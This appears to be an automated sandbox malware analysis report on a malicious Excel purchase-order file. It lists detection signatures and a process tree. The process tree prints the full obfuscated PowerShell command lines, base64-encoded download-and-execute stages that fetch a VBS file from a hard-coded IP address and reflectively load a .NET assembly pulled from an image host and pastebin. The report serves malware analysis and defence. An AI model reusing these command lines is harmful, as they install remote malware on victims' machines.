Windows
Analysis Report
NB PO-104105107108.xls
Overview
General Information
Detection
Metric | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected obfuscated html page
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3288 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3580 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 3712 cmdline: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3736 cmdline: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3988 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 4032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- mshta.exe (PID: 2772 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 3040 cmdline: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3068 cmdline: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 2100 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 2036 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 2648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |